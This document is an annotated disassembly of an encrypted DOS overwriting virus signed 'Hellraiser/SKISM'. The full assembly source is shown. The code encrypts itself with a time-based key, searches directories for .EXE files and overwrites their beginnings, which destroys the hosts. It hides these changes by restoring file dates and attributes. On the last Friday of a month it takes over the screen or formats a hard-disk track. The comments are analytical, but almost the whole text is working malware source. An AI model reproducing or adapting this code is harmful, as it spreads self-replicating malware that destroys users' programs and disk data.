
;NAME: HR.DEC
;FILE SIZE: 0062Ch - 1580d
;START (CS:IP): 00100h
;CODE END: 0072Ch
;CODE ORIGIN: 00100h
;DATE: Sun Aug 02 17:20:02 1992
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING
P00100 PROC
ORG 0100h
; .COM image layout at the entry point: a 2-byte short jump (EB 03) at
; 0100h, the NOP at 0102h and the 2-byte XOR key ENCRKEY at 0103h..0104h.
; The leading word EB 03 doubles as the infection marker: the host check
; at 06C9h compares a candidate file's first word against 03EBh.
START: JMP Short BEGIN ; EB 03: hop over the NOP and the key word
;---------------------------------------------------
NOP
ENCRKEY:DB 0Ch,32h ; 16-bit XOR key at 0103h. Overwritten with the time word from INT 21h/2Ch at 052Dh, so each new infection is written with a different key. 32h may not be needed... ;OR AH,32
BEGIN: CALL CRYPT ; Decrypt the virus body (everything from MESSAGE onward is stored XORed in the file)
JMP H00520 ; continue in the now-decrypted code
;---------------------------------------------------
; CRYPT: XOR every word from MESSAGE onward with the key word at ENCRKEY.
; XOR is its own inverse, so the same routine decrypts at startup (BEGIN)
; and encrypts / re-decrypts around the file write in INFECT.
; In:   DS = CS (.COM), ENCRKEY = key word
; Out:  memory from MESSAGE onward transformed in place
; Clob: AX, SI, DI, flags; DF cleared; CX saved and restored
; NOTE(review): CX = 0766h words = 0ECCh bytes, but MESSAGE..CODE END
; (072Ch) is roughly 5F2h bytes, so the loop also XORs the memory that
; follows the image in the segment. That excess is never written to disk.
CRYPT: PUSH CX
MOV SI,OFFSET MESSAGE ; source = destination: transform in place
MOV DI,SI
MOV CX,0766h ; word count (see note above)
CLD
LOOP_1: LODSW
XOR AX,DS:ENCRKEY ;DS may not be needed (DS is the default segment for a direct address)
STOSW
DEC CX
JNZ LOOP_1
POP CX
RET
;---------------------------------------------------
; INFECT: write the 062Ch-byte image (0100h..072Ch) to the file whose
; handle is in HANDLE, at the file's current position.
; In:   HANDLE = handle opened read/write by H006DE. No seek is done, so
;       the write starts at offset 0 and replaces the start of the host
;       .EXE instead of appending to it: the host is not preserved.
; Out:  file written; the body is encrypted with the current ENCRKEY for
;       the write and decrypted again so the running copy keeps working
; Clob: AX, BX, CX, DX plus whatever CRYPT touches
; NOTE: the CF/AX result of INT 21h/40h is not examined.
INFECT: MOV DX,0100h ;Offset to begin at (start of the image in memory)
MOV BX,DS:[HANDLE] ;BX=File handle
PUSH BX ;I don't know why, BX doesn't change (CRYPT never touches BX).
MOV CX,062Ch ;CX=number of bytes to write (0100h..072Ch)
CALL CRYPT ;Encrypt before saving
POP BX ;I don't know why, BX doesn't change.
MOV AX,4000h ;AH = 40h, write to file.
INT 21h ;Infect the file.
PUSH BX ;Again, BX never changes.
CALL CRYPT ;Decrypt again so the in-memory copy stays usable
POP BX
RET ;RET_Near
;---------------------------------------------------
; These are the big, red block letters that show when it goes off.
; MESSAGE: packed screen image that H0057E expands straight into text
; video RAM (bytes below 20h are colour / new-row / run-length codes,
; bytes 20h and above are characters; see the decoder at 057Eh).
; This is the first byte of the region CRYPT transforms, so in the file
; everything from here to the end of the image is stored XORed with
; ENCRKEY; only the plain text "I'll be back..." is readable in this
; decrypted listing.
MESSAGE:
DB 0Fh,10h,18h,19h,1Fh,"I'll be back..."
DB 18h,18h,14h,20h,20h,00Ch,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h
DB 20h,0DEh,10h,19h,05h,14h,19h,05h,0DEh,10h,20h,20h,14h,19h,06h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,18h,20h,20h,0DEh,10h
DB 20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,20h,20h
DB 0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,06h,16h,0DEh
DB 10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h
DB 05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,18h,20h
DB 20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h
DB 04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,20h
DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h
DB 20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h
DB 20h,16h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h
DB 0DEh,10h,20h,20h,14h,20h,20h,16h,0DEh,18h,14h,19h,05h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh
DB 10h,19h,05h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h
DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h
DB 19h,05h,16h,0DEh,10h,20h,14h,19h,04h,0DEh,10h,20h,20h,14h,20h,20h
DB 0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh,10h,20h,14h,20h,20h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h
DB 04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,04h,0DEh,10h,19h,02h,14h
DB 19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,16h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,19h,04h,16h,0DEh,18h,14h
DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h
DB 20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h
DB 0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h
DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h
DB 14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h
DB 14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,10h,19h,03h,14h
DB 20h,10h,19h,02h,14h,20h,20h,10h,19h,05h,14h,20h,20h,10h,19h,06h,14h,20h
DB 20h,10h,20h,20h,14h,20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h
DB 02h,14h,20h,10h,19h,02h,14h,20h,20h,10h,20h,20h,14h,20h,10h,19h
DB 03h,14h,20h,20h,10h,19h,06h,14h,20h,20h,10h,19h,04h,14h,20h
DB 10h,19h,02h,14h,20h,20h,18h,20h,10h,19h,03h,14h,20h,10h,19h,02h
DB 14h,20h,10h,19h,06h,14h,20h,10h,19h,07h,14h,20h,10h,19h,02h,14h
DB 20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,06h,14h,20h
DB 10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,07h,14h,20h,10h,19h
DB 05h,14h,20h,10h,19h,03h,14h,20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h
DB 07h,14h,20h,10h,19h,02h,14h,20h,10h,19h,07h,14h,20h,10h,19h,06h
DB 14h,20h,10h,19h,07h,14h,20h,10h,19h,07h,14h,20h,10h,19h,00Ah,14h
DB 20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h,07h,14h,20h,10h,19h,13h,14h
DB 20h,10h,19h,10h,14h,20h,18h,10h,19h,40h,14h,20h,18h,18h,2Ah
;---------------------------------------------------
; Search specs and DTA #1. The directory walk addresses these directly:
;   0453h = "*" (the 2Ah that ends MESSAGE) followed by this 00h -> find-first spec at 0612h
;   0455h = "*.EXE",00h                                          -> find-first spec at 0647h
;   045Bh = "\",00h                                              -> chdir root at 060Bh, 065Fh, 070Bh
;   045Dh = DTA #1 (INT 21h/1Ah at 05F5h); the 03h,"????????","   "
;           here are its drive/template fields left over from an earlier run
DB 00 ;00454
DB "*.EXE" ;00455
DB 00h,"\",00h,03h ;0045A
DB 8 DUP("?") ;0045E 3F
DB " " ;00466 202020
;---------------------------------------------------
;Not code: 0469h..047Ah lie inside DTA #1 (045Dh..0488h), so these bytes
;are the found-file fields DOS fills in through INT 21h/4Eh,4Fh (attribute,
;time, date, size) - residue from an earlier run that the disassembler
;rendered as instructions. Nothing jumps here and nothing reads them as
;code; the DTA's filename field follows at 047Bh.
ADC AX,[BP+DI] ;00469 1303 __
ADD [BX+SI],AL ;0046B 0000 __
ADD [BP+SI],CH ;0046D 002A _*
SHR BP,1 ;0046F D1ED __
DEC DX ;00471 4A J
ADC DL,DS:[0E278h] ;00472 121678E2 __x_
PUSH SS ;00476 16 _
ADD [BX+SI],AL ;00477 0000 __
ADD [BX+SI],AL ;00479 0000 __
;---------------------------------------------------
; Working storage. The values shown are residue from an earlier run,
; apparently an infection of SAMPLE3.EXE: the bytes at 04FEh/0500h match
; the time/date fields at 049Eh/04A0h of DTA #2 below.
DB "ARMOR" ;0047B 41524D4F52 ; DTA #1 name field (045Dh+1Eh): the directory entry found by the "*" search; chdir target at 062Ah
DB 00h ;00480
DB " " ;00481 2020
DB 00h ;00483
DB 00h ;00484
DB 00h ;00485
DB 00h ;00486
DB 00h ;00487
DB 03h ;00488 ; DTA #2 (Set DTA at 0640h; also the BX base for the date/time loads at 0686h)
DB 8 DUP("?") ;00489 3F ; DTA #2 search template
DB "EXE" ;00491 455845
DB 07h ;00494 ; DTA #2 search attribute mask
DB 04h ;00495
DB 00h ;00496
DB "3" ;00497 33
DB 1Fh ;00498
DB "*" ;00499 2A
DB 0D1h ;0049A
DB 0EDh ;0049B
DB "J " ;0049C 4A20
DB 02h ;0049E ; DTA #2 found-file time
DB "x" ;0049F 78
DB 0F0h ;004A0 ; DTA #2 found-file date
DB 16h ;004A1
DB 02h ;004A2
DB 00h ;004A3
DB 00h ;004A4
DB 00h ;004A5
DB "SAMPLE3.EXE" ;004A6 53414D504C4533 ; DTA #2 name field (0488h+1Eh): the host chosen by the "*.EXE" search; DX for INT 21h 43h/3Dh/57h
DB 00h ;004B1
DB 00h ;004B2
DB 9Eh ;004B3 ; saved DTA #1 segment (stored at 0635h)
DB "-]" ;004B4 2D5D ; ...and its offset 045Dh (stored at 0639h)
DB 04h ;004B6
DB 88h ;004B7 ; saved DTA #2 offset 0488h (stored at 067Ch)
DB 04h ;004B8
DB 9Eh ;004B9 ; saved DTA #2 segment (stored at 0678h)
DB "-" ;004BA 2D
DB 00h ;004BB
DB "ARMOR" ;004BC 41524D4F52 ; 64-byte buffer for the original current directory (INT 21h/47h at 0606h), restored by the chdir at 0715h
DB 00h ;004C1
DB 58 DUP(00h) ;004C2
HANDLE: DB 05h ;004FC ; host file handle, stored as a word by MOV DS:[HANDLE],AX. Declared DB but referenced as a word; MASM would need WORD PTR on those references.
DB 00h ;004FD
DB 02h ;004FE ; saved host time (DTA #2 +16h, stored at 068Fh)
DB "x" ;004FF 78
DB 0F0h ;00500 ; saved host date (DTA #2 +18h, stored at 0689h)
DB 16h ;00501
DB " " ;00502 20 ; saved host attributes (stored at 069Ah)
DB 00h ;00503
DB 0CDh ;00504 ; 2-byte read buffer: the host's first word, compared with 03EBh at 06C9h
DB " " ;00505 20
DB 00h ;00506
DB 00h ;00507
DB "Written by Dennis Yelle" ;00508 5772697474656E ; not referenced by the visible code
DB 00h ;0051F
;---------------------------------------------------
; Create new encryption key
; H00520: first code executed after decryption.
;  1. INT 21h/30h: DOS version. Below 2.x -> H0056B -> H0061E -> H00671
;     -> H006EC (restore/exit path; nothing is infected).
;  2. INT 21h/2Ch: time of day. DX (seconds, hundredths) is stored over
;     ENCRKEY at 0103h: it becomes the key for the next infection and is
;     also the CX handed to the format call at 05EAh.
;  3. INT 21h/2Ah: date. DL = day of month, AL = day of week (5 = Friday).
;     Day >= 25 (19h) and Friday -> payload at H00541; a Friday that late
;     is the month's last Friday. Otherwise H0053E -> H005F2 (infection).
H00520: MOV AX,3000h ;00520 B80030 __0
INT 21h ;2-DOS_Ver ;00523 CD21 _!
CMP AL,02h ;00525 3C02 <_
JB H0056B ;00527 7242 rB
MOV AH,2Ch ;00529 B42C _,
INT 21h ;1-Get_Time ;0052B CD21 _!
MOV DS:[0103h],DX ;0052D 89160301 ____ ; overwrite ENCRKEY with the time word
; Check to see if it's the last Friday in month, if so, go off.
; H00531 is also the loop target of the colour-screen payload (0566h).
H00531: MOV AH,2Ah ;00531 B42A _*
INT 21h ;1-Get_Date ;00533 CD21 _!
CMP DL,19h ;00535 80FA19 ___ ; day of month < 25 ?
JL H0053E ;00538 7C04 |_
CMP AL,05h ;0053A 3C05 <_ ; Friday ?
JZ H00541 ;0053C 7403 t_
H0053E: JMP H005F2 ;0053E E9B100 ___ ; not a trigger day: go and infect
;---------------------------------------------------
; GO OFF!
; H00541: payload (trigger date met).
; Colour adapter: select mode 3, set the cursor shape, unpack MESSAGE
; (013Ah) into text video RAM at B800:0000 via H0057E, then jump back to
; H00531. The date is re-read there and still matches, so this repeats
; until the machine is reset; no file is infected on this path.
; Monochrome adapter (INT 10h/0Fh returns mode 7): H00568 -> H005DC, the
; disk-format branch, which then falls into the infection routine.
H00541: MOV AH,0Fh ;00541 B40F
INT 10h ;Get current vid mode ;00543 CD10
CMP AL,07h ;00545 3C07
JZ H00568 ;If mono, format ;00547 741F
MOV AX,0003h ;80x25 16 color ;00549 B80300
INT 10h ;Set video mode ;0054C CD10
MOV AH,01h ;0054E B401
MOV CX,0808h ;No cursor ;00550 B90808
INT 10h ;Set cursor size ;00553 CD10
MOV SI,013Ah ;00555 BE3A01 ; 013Ah appears to be OFFSET MESSAGE (the packed image)
MOV AX,0B800h ;Video segment ;00558 B800B8
MOV ES,AX ;ES_Chg ;0055B 8EC0
MOV DI,0000h ; ;0055D BF0000 ; top-left cell
MOV CX,0319h ;00560 B91903 ; packed byte count
CALL H0057E ; . . . . . . . . . ;00563 E81800 ; unpack to screen
JMP Short H00531 ;00566 EBC9 ; re-check the date and repeat indefinitely
;---------------------------------------------------
H00568: JMP Short H005DC ;00568 EB72 _r ; mono: format-track branch
;---------------------------------------------------
NOP ;0056A 90 _
H0056B: JMP H0061E ;0056B E9B000 ___ ; DOS < 2: straight to the exit path
;---------------------------------------------------
DB " -=PHALCON=- " ;0056E 20202D3D504841 ; group tag embedded in the body; not referenced by the visible code
DB 00h ;0057D
;---------------------------------------------------
; Display message... TheDraw algorithm for unpacking the image.
; H0057E: expand the packed screen image at DS:SI into the text buffer at
; ES:DI (one character+attribute word per cell).
; In:   DS:SI = packed bytes, ES:DI = destination, CX = packed byte count
; Out:  cells written; returns at once when CX = 0
; Clob: AX, BX, CX, DX, SI, DI, flags; DF cleared
; AH holds the current attribute, DX the address of the current row start.
; Byte meanings as decoded by the branches below:
;   20h and up      character, stored with the current attribute
;   00h..0Fh        foreground colour: low nibble of AH
;   10h..17h        background colour: bits 4-6 of AH
;   18h             next row (DX += 0A0h, one 80-column line)
;   19h, n          n+1 spaces
;   1Ah, n, c       n+1 copies of c
;   1Bh             toggle bit 7 of AH
;   1Ch..1Fh        ignored
H0057E: JCXZ H005DB ;Jumps to a ret ;0057E E35B _[
MOV DX,DI ;00580 8BD7 __ ; row start
XOR AX,AX ;00582 33C0 3_ ; attribute = 0
CLD ;00584 FC _
H00585: LODSB ;Take a byte ;00585 AC _
CMP AL,20h ;If it's <space ;00586 3C20 <
JB H0058F ;Jump ;00588 7205 r_
STOSW ;Move to screen ;0058A AB _ ; char in AL, attribute in AH
H0058B: LOOP H00585 ;0058B E2F8 __
JMP Short H005DB ;0058D EB4C _L
;---------------------------------------------------
H0058F: CMP AL,10h ;If it's not<10h ;0058F 3C10 <_
JNB H0059A ;Jump ;00591 7307 s_
AND AH,0F0h ;00593 80E4F0 ___ ; replace foreground nibble
OR AH,AL ;00596 0AE0 __
JMP Short H0058B ;00598 EBF1 __
;---------------------------------------------------
H0059A: CMP AL,18h ;0059A 3C18 <_
JZ H005B1 ;0059C 7413 t_ ; 18h: new row
JNB H005B9 ;0059E 7319 s_ ; above 18h: other controls
SUB AL,10h ;005A0 2C10 ,_ ; 10h..17h -> 0..7
ADD AL,AL ;005A2 02C0 __ ; shift left 4 into the background field
ADD AL,AL ;005A4 02C0 __
ADD AL,AL ;005A6 02C0 __
ADD AL,AL ;005A8 02C0 __
AND AH,8Fh ;005AA 80E48F ___ ; keep bit 7 and the foreground nibble
OR AH,AL ;005AD 0AE0 __
JMP Short H0058B ;005AF EBDA __
;---------------------------------------------------
H005B1: ADD DX,00A0h ;005B1 81C2A000 ____ ; next row: 80 cells * 2 bytes
MOV DI,DX ;005B5 8BFA __
JMP Short H0058B ;005B7 EBD2 __
;---------------------------------------------------
H005B9: CMP AL,1Bh ;005B9 3C1B <_
JB H005C4 ;005BB 7207 r_ ; 19h/1Ah: run-length codes
JNZ H0058B ;005BD 75CC u_ ; 1Ch..1Fh: ignored
XOR AH,80h ;005BF 80F480 ___ ; 1Bh: toggle bit 7
JMP Short H0058B ;005C2 EBC7 __
;---------------------------------------------------
H005C4: CMP AL,19h ;005C4 3C19 <_ ; ZF survives the moves/LODSB below
MOV BX,CX ;005C6 8BD9 __ ; remember remaining count
LODSB ;005C8 AC _ ; run length
MOV CL,AL ;005C9 8AC8 __
MOV AL,20h ;005CB B020 _ ; 19h fills with spaces
JZ H005D1 ;005CD 7402 t_
LODSB ;005CF AC _ ; 1Ah: character to repeat
DEC BX ;005D0 4B K ; one more input byte consumed
H005D1: XOR CH,CH ;005D1 32ED 2_
INC CX ;005D3 41 A ; n+1 cells
REPZ STOSW ;005D4 F3AB __
MOV CX,BX ;005D6 8BCB __
DEC CX ;005D8 49 I ; account for the length byte
LOOPNZ H00585 ;005D9 E0AA __ ; and for the code byte
H005DB: RET ;RET_Near ;005DB C3 _
;End of display message procedure
;---------------------------------------------------
; H005DC: reached only on a monochrome adapter on a trigger day.
; INT 13h/15h asks whether drive 80h (first hard disk) is a fixed disk
; (AH = 3). If so, INT 13h/05h formats a track on it: CX (track/sector
; fields) comes from the time word stored at 0103h, AL = 4 sectors, and
; DH is not set here. This is the destructive part of the payload; on a
; machine without a hard disk it is skipped. Execution then falls into
; the infection routine.
; H005F2: infection routine, also the target of H0053E on non-trigger
; days. Set DTA #1 (045Dh), record the current drive (19h) and directory
; (47h into 04BCh; DL = drive number + 1), chdir "\", then find-first
; "*" (spec at 0453h) with attribute mask 13h (read-only|hidden|
; directory). AX = 12h (no more files) -> H0061E -> exit path. Success is
; judged by AX != 12h, not by CF.
H005DC: MOV AH,15h ;005DC B415 __
MOV DL,80h ;005DE B280 __ ; first hard disk
INT 13h ;BAT-Dsk_Type ;005E0 CD13 __
CMP AH,03h ;005E2 80FC03 ___ ; fixed disk present?
JNZ H005F2 ;005E5 750B u_
MOV AX,0504h ;005E7 B80405 ___ ; AH=05h format track, AL=4 sectors
MOV CX,DS:[0103h] ;005EA 8B0E0301 ____ ; track/sector = the stored time word
MOV DL,80h ;005EE B280 __
INT 13h ;B-Fmt_FD_Trk ;005F0 CD13 __ ; on drive 80h, i.e. the hard disk, not a floppy
H005F2: MOV DX,045Dh ;005F2 BA5D04 _]_ ; DTA #1
MOV AH,1Ah ;005F5 B41A __
INT 21h ;1-Set_DTA ;005F7 CD21 _!
MOV AH,19h ;005F9 B419 __
INT 21h ;1-Get_Cur_Dr ;005FB CD21 _!
MOV DL,AL ;005FD 8AD0 __
INC DL ;005FF FEC2 __ ; 47h wants 1-based drive
MOV AH,47h ;00601 B447 _G
MOV SI,04BCh ;00603 BEBC04 ___ ; save current directory here
INT 21h ;2-Cur_Dir ;00606 CD21 _!
MOV DX,045Bh ;00608 BA5B04 _[_ ; "\"
MOV AH,3Bh ;0060B B43B _;
INT 21h ;2-Chg_Dir ;0060D CD21 _!
MOV CX,0013h ;0060F B91300 ___ ; attribute mask
MOV DX,0453h ;00612 BA5304 _S_ ; "*"
MOV AH,4Eh ;00615 B44E _N
INT 21h ;2-Srch_1st_Fl_Hdl ;00617 CD21 _!
CMP AX,0012h ;00619 3D1200 =__ ; no more files?
JNZ H00621 ;0061C 7503 u_
H0061E: JMP Short H00671 ;0061E EB51 _Q ; nothing to walk: exit path
;---------------------------------------------------
NOP ;00620 90 _
; H00621: directory loop. Find-next on the "*" search (the first hit from
; 0617h is never used); AX = 12h -> H00671 -> exit path. Otherwise chdir
; into the found entry (DTA #1 name field at 047Bh; CF not checked), save
; the DTA #1 address DOS returns via 2Fh (ES:BX -> 04B3h/04B5h), switch to
; DTA #2 (0488h) and find-first "*.EXE" (0455h, attribute mask 07h).
; Any AX other than 12h - including other error codes - is taken as a
; hit and goes to H00674.
; H00653: find-next "*.EXE"; also re-entered from H006CF after a host is
; rejected. When the directory is exhausted: chdir "\", restore DTA #1
; and return to H00621 for the next directory entry.
; MOV DS,DS:[04B3h] reloads DS from the saved segment, which in a .COM
; image is the same as CS.
H00621: MOV AH,4Fh ;00621 B44F _O
INT 21h ;2-Srch_Nxt_Fl_Hdl ;00623 CD21 _!
CMP AX,0012h ;00625 3D1200 =__ ; no more entries?
JZ H00671 ;00628 7447 tG
MOV DX,047Bh ;0062A BA7B04 _{_ ; name of the found entry
MOV AH,3Bh ;0062D B43B _;
INT 21h ;2-Chg_Dir ;0062F CD21 _!
MOV AH,2Fh ;00631 B42F _/
INT 21h ;2-Get_DTA ;00633 CD21 _!
MOV DS:[04B3h],ES ;00635 8C06B304 ____ ; save DTA #1 segment
MOV DS:[04B5h],BX ;00639 891EB504 ____ ; save DTA #1 offset
MOV DX,0488h ;0063D BA8804 ___ ; DTA #2
MOV AH,1Ah ;00640 B41A __
INT 21h ;1-Set_DTA ;00642 CD21 _!
MOV CX,0007h ;00644 B90700 ___ ; attribute mask
MOV DX,0455h ;00647 BA5504 _U_ ; "*.EXE"
MOV AH,4Eh ;0064A B44E _N
INT 21h ;2-Srch_1st_Fl_Hdl ;0064C CD21 _!
CMP AX,0012h ;0064E 3D1200 =__
JNZ H00674 ;00651 7521 u! ; candidate host found
H00653: MOV AH,4Fh ;00653 B44F _O
INT 21h ;2-Srch_Nxt_Fl_Hdl ;00655 CD21 _!
CMP AX,0012h ;00657 3D1200 =__
JNZ H00674 ;0065A 7518 u_ ; next candidate host
MOV DX,045Bh ;0065C BA5B04 _[_ ; back to "\"
MOV AH,3Bh ;0065F B43B _;
INT 21h ;2-Chg_Dir ;00661 CD21 _!
MOV AH,1Ah ;00663 B41A __
MOV DS,DS:[04B3h] ;DS_Chg ;00665 8E1EB304 ____ ; restore DTA #1 ...
MOV DX,DS:[04B5h] ;00669 8B16B504 ____
INT 21h ;1-Set_DTA ;0066D CD21 _!
JMP Short H00621 ;0066F EBB0 __ ; ... and continue the directory search
;---------------------------------------------------
; H00671: no host found -> H006EC (restore/exit).
; H00674: an entry matched "*.EXE" in DTA #2. Save the DTA #2 address
; (ES:BX -> 04B9h/04B7h), copy the host's date (DTA+18h -> 0500h) and
; time (DTA+16h -> 04FEh) so they can be put back after the write, read
; its attributes (43h/00 -> 0502h) and clear them (43h/01, CX = 0) so a
; read-only host can still be opened for writing. DX = 04A6h, the DTA #2
; name field (the host's name), is the path for the 43h calls.
; NOTE: MOV AX,[BX+15h] (found-file attribute byte) is overwritten by
; MOV AX,4300h on the next line - a dead load.
H00671: JMP Short H006EC ;00671 EB79 _y
;---------------------------------------------------
NOP ;00673 90 _
H00674: MOV AH,2Fh ;00674 B42F _/
INT 21h ;2-Get_DTA ;00676 CD21 _!
MOV DS:[04B9h],ES ;00678 8C06B904 ____ ; save DTA #2 segment
MOV DS:[04B7h],BX ;0067C 891EB704 ____ ; save DTA #2 offset
MOV DX,04A6h ;00680 BAA604 ___ ; host name (DTA #2 + 1Eh)
MOV BX,0488h ;00683 BB8804 ___ ; DTA #2 base
MOV AX,[BX+18h] ;00686 8B4718 _G_ ; host date
MOV DS:[0500h],AX ;00689 A30005 ___
MOV AX,[BX+16h] ;0068C 8B4716 _G_ ; host time
MOV DS:[04FEh],AX ;0068F A3FE04 ___
MOV AX,[BX+15h] ;00692 8B4715 _G_ ; dead load (see note above)
MOV AX,4300h ;00695 B80043 __C ; get attributes
INT 21h ;2-Fl_Hdl_Attr ;00698 CD21 _!
MOV DS:[0502h],CX ;0069A 890E0205 ____ ; save them for H006EC
MOV AX,4301h ;0069E B80143 __C ; set attributes ...
XOR CX,CX ;006A1 33C9 3_ ; ... to none
INT 21h ;2-Set_Fl_Attr (AX=4301h; the disassembler's "TERM_norm" tag here was wrong) ;006A3 CD21 _!
;---------------------------------------------------
; Already-infected check. Open the host read-only (3D00h); on CF -> H006CF
; (skip it). Read its first two bytes into 0504h, close it and compare the
; word with 03EBh - the bytes EB 03 (JMP SHORT +3) this image starts with
; at START. Equal means already infected -> H006CF; otherwise -> H006DE.
; The read's CF/AX result is not examined.
; H006CF: restore DTA #2 (segment 04B9h, offset 04B7h; DS reloaded from
; the saved segment) and resume the "*.EXE" search at H00653.
MOV AX,3D00h ;006A5 B8003D __=
INT 21h ;2-Open_Fl_Hdl ;006A8 CD21 _!
JB H006CF ;006AA 7223 r# ; open failed: next candidate
MOV DS:[HANDLE],AX ;006AC A3FC04 ___
MOV AH,3Fh ;006AF B43F _?
MOV BX,DS:[HANDLE] ;006B1 8B1EFC04 ____
MOV CX,0002h ;006B5 B90200 ___ ; two bytes
MOV DX,0504h ;006B8 BA0405 ___ ; into the read buffer
INT 21h ;2-Rd_Fl_Hdl ;006BB CD21 _!
MOV AH,3Eh ;006BD B43E _>
MOV BX,DS:[HANDLE] ;006BF 8B1EFC04 ____
INT 21h ;2-Close_Fl_Hdl ;006C3 CD21 _!
MOV BX,DS:[0504h] ;006C5 8B1E0405 ____
CMP BX,03EBh ;006C9 81FBEB03 ____ ; starts with EB 03 = our own marker?
JNZ H006DE ;006CD 750F u_ ; no: infect it
H006CF: MOV AH,1Ah ;006CF B41A __
MOV DS,DS:[04B9h] ;DS_Chg ;006D1 8E1EB904 ____ ; restore DTA #2 ...
MOV DX,DS:[04B7h] ;006D5 8B16B704 ____
INT 21h ;1-Set_DTA ;006D9 CD21 _!
JMP H00653 ;006DB E975FF _u_ ; ... and look for the next .EXE
;---------------------------------------------------
; H006DE: host accepted. Reopen it read/write (3D02h; CF not checked),
; store the handle and call INFECT, which overwrites the first 062Ch
; bytes of the file with this image.
; H006EC: restore and exit; also reached from H00671 when no host was
; found, in which case HANDLE, 04A6h and the saved stamps still hold
; whatever the stored image contained. Put back the host's time/date
; (57h/01) and attributes (43h/01 from 0502h), chdir "\" and then to the
; original directory saved at 04BCh, and terminate via INT 21h/4Ch.
; The write handle is never closed explicitly; DOS releases it at 4Ch.
H006DE: MOV DX,04A6h ;006DE BAA604 ___ ; host name
MOV AX,3D02h ;006E1 B8023D __= ; open read/write
INT 21h ;006E4 CD21 _! ;2-Open_Fl_Hdl
MOV DS:[HANDLE],AX ;006E6 A3FC04 ___
CALL INFECT ; . . . . . . . . . ;006E9 E834FA _4_ ; overwrite the host's first 062Ch bytes
H006EC: MOV AX,5701h ;006EC B80157 __W ; set file time/date
MOV BX,DS:[HANDLE] ;006EF 8B1EFC04 ____
MOV CX,DS:[04FEh] ;006F3 8B0EFE04 ____ ; saved time
MOV DX,DS:[0500h] ;006F7 8B160005 ____ ; saved date
INT 21h ;2-Fl_Hdl_Date_Time ;006FB CD21 _!
MOV AX,4301h ;006FD B80143 __C ; set attributes
MOV CX,DS:[0502h] ;00700 8B0E0205 ____ ; saved attributes
MOV DX,04A6h ;00704 BAA604 ___ ; host name
INT 21h ;2-Fl_Hdl_Attr ;00707 CD21 _!
MOV AH,3Bh ;00709 B43B _;
MOV DX,045Bh ;0070B BA5B04 _[_ ; "\"
INT 21h ;2-Chg_Dir ;0070E CD21 _!
MOV AH,3Bh ;00710 B43B _;
MOV DX,04BCh ;00712 BABC04 ___ ; original current directory
INT 21h ;2-Chg_Dir ;00715 CD21 _!
MOV AX,4C00h ;00717 B8004C __L ; exit code 0
INT 21h ;2-TERM_w_Ret_Cd ;0071A CD21 _!
;---------------------------------------------------
DB "Hellraiser/SKISM" ;0071C 48656C6C726169 ; author/group tag; these 16 bytes end the 062Ch-byte image at 072Ch (CODE END)
;---------------------------------------------------
P00100 ENDP
CODE ENDS
END H00100 ; NOTE(review): no label H00100 is defined in this listing; the entry point is START at ORG 0100h
;-------------------------------------------------------------------------------